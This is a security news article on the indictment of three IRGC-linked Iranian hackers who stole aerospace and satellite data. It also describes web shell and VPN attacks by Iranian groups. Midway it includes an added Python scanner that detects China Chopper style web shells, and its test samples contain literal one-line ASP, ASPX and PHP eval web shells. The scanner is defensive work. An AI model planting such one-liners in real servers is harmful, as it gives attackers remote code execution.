Three hackers residing in Iran have been indicted for stealing data from aerospace and satellite tracking companies.
The hackers took part in a coordinated campaign of identity theft and hacking on behalf of Iran’s Islamic Revolutionary Guard Corps (IRGC), a designated foreign terrorist organization. The campaign aimed to steal critical information related to United States aerospace and satellite technology and resources.
The indictment charged Said Pourkarim Arabi, 34, Mohammad Reza Espargham, 25, and Mohammad Bayati, 34.
The hacking campaign has been active since July 2015 and continued until at least February 2019.
“The defendants at one time possessed a target list of over 1,800 online accounts, including accounts belonging to organizations and companies involved in aerospace or satellite technology and international government organizations in Australia, Israel, Singapore, the United States, and the United Kingdom.” reads the DoJ’s press release.
The campaign targeted multiple organizations both in the US and abroad; the hackers focused on the theft of commercial information and intellectual property.
The three hackers used fake online profiles and email accounts to impersonate US citizens working in the satellite and aerospace fields.
The threat actors used these fake identities to target individuals at the organizations of interest. Once a recipient clicked a link included in one of the spear-phishing messages, the infection process started.
The Iranian hackers targeted individuals included in a list of 1,800 online accounts belonging to people working with aerospace and satellite companies, and government organizations. Targeted entities are in Australia, Israel, Singapore, the US, and the UK.
“Today’s charges are yet another example of the FBI’s dedication to investigating those who target and attempt to steal data and proprietary information from the United States,” said James A. Dawson, Assistant Director in Charge of the FBI’s Washington Field Office. “Today’s charges allege that these individuals conspired in a coordinated campaign with known IRGC members and acted at their direction. The defendants targeted thousands of individuals in an attempt to steal critical information related to United States aerospace and satellite technology. The FBI remains dedicated to protecting the United States, and we continue to impose risk and consequences on cyber adversaries through our unique authorities, world-class capabilities, and enduring partnerships.”
According to a recently published CISA report, Iranian hackers from an unnamed APT group are employing several known web shells in attacks on IT, government, healthcare, financial, and insurance organizations across the United States. The malware used by the threat actors includes the ChunkyTuna, Tiny, and China Chopper web shells.
The Iranian hackers belong to an Iran-based threat actor that was behind attacks exploiting vulnerabilities in Pulse Secure VPN, Citrix Application Delivery Controller (ADC) and Gateway, and F5’s BIG-IP ADC products.
A few weeks ago, researchers from Crowdstrike revealed that the Iran-linked APT group tracked as Pioneer Kitten, also known as Fox Kitten or Parisite, is now trying to monetize its efforts by selling access to some of the networks it has hacked to other hackers.
The Iranian hackers have been attacking corporate VPNs over the past months, hacking VPN servers to plant backdoors in companies around the world and targeting Pulse Secure, Fortinet, Palo Alto Networks, and Citrix VPNs.
The CISA Malware Analysis Report (MAR) includes technical details of 19 malicious files, including multiple components of the China Chopper web shell, such as an ASP application that listens for incoming HTTP connections from a remote operator.
Once a target was infected, the hackers used multiple tools to steal sensitive data and maintain a foothold in the target networks. The list of tools in the arsenal of the group includes Metasploit, Mimikatz, NanoCore, and a generic Python backdoor.
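As an added, defender-side example (not code from the article, from CISA, or from the indictment): a small Python scanner that walks a web root looking for the single-line "pass the request parameter to eval" pattern that China Chopper style server-side web shells use, so that a dropped ASP/ASPX/PHP file of the kind the MAR describes can be found during triage. The signature regexes, the file extensions and the sample files are constructed for this illustration, not taken from the report.

```python
import re
import tempfile
from pathlib import Path

# Script extensions worth inspecting in a web root (assumed list for this example).
WEB_EXTENSIONS = {".asp", ".aspx", ".ashx", ".php", ".jsp"}

# Constructed signatures for one-line web shells of the China Chopper family:
# the server-side component is typically a single eval() over request data.
SHELL_PATTERNS = {
    "asp_eval_request": re.compile(r'<%\s*eval\s*\(?\s*request\s*\(', re.IGNORECASE),
    "aspx_eval_request": re.compile(r'eval\s*\(\s*Request\s*\.\s*Item\s*\[', re.IGNORECASE),
    "php_eval_post": re.compile(r'@?eval\s*\(\s*\$_(POST|REQUEST|GET)\s*\[', re.IGNORECASE),
    "jsp_runtime_exec": re.compile(
        r'Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(\s*request\s*\.\s*getParameter',
        re.IGNORECASE,
    ),
}


def scan_content(text):
    """Return the names of every signature that matches the given file text."""
    return [name for name, rx in SHELL_PATTERNS.items() if rx.search(text)]


def scan_webroot(root):
    """Walk a web root and return {relative_path: [signature names]} for matching files.

    Whole files are read (decoding errors ignored) so that a shell appended to
    the end of an otherwise legitimate script is still seen.
    """
    root = Path(root)
    hits = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        try:
            text = path.read_bytes().decode("utf-8", errors="ignore")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        matched = scan_content(text)
        if matched:
            hits[path.relative_to(root).as_posix()] = matched
    return hits


# Constructed sample web root for the demo (not real captured artefacts):
# three planted one-liner shells, one benign page, one non-script file.
SAMPLE_FILES = {
    "images/cache.asp": '<%eval request("secret")%>',
    "app/upload.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["secret"],"unsafe");%>',
    "include/config.php": "<?php @eval($_POST['secret']); ?>",
    "app/Default.aspx": '<%@ Page Language="C#" %>\n<html><body>Hello</body></html>',
    "static/logo.png": "not a web script at all",
}


def demo():
    """Write the constructed samples into a temporary web root, scan it and return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, content in SAMPLE_FILES.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content, encoding="utf-8")
        return scan_webroot(root)


if __name__ == "__main__":
    for rel_path, sigs in sorted(demo().items()):
        print(f"{rel_path}: {', '.join(sigs)}")
```

Signature matching of this kind only catches the plain, unobfuscated variants; in practice it is paired with a file-integrity baseline of the web root and review of web-server logs for POST requests to script files that the application never normally receives.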
The leader of the group was Arabi, whom US officials identified as a member of Iran’s Islamic Revolutionary Guard Corps (IRGC). He participated in many other operations against the US and US firms.
According to investigators, Arabi lived in IRGC housing.
Espargham also used the online monikers “Reza Darkcoder” and “M.R.S.CO,” and he was known to be the leader of the Iranian Dark Coders Team, a group of website defacers.
Arabi and Espargham collaborated to target aerospace and satellite companies. Espargham, described as a white-hat hacker, provided Arabi with malware and supported him in hacking operations. He also created a tool named VBScan that scanned vBulletin forums for vulnerabilities.
The third hacker also provided the group with malware to use in their cyber attacks.
All three remain at large in Iran and have been added to the FBI’s Cyber Most Wanted List.
(SecurityAffairs – hacking, Iranian hackers)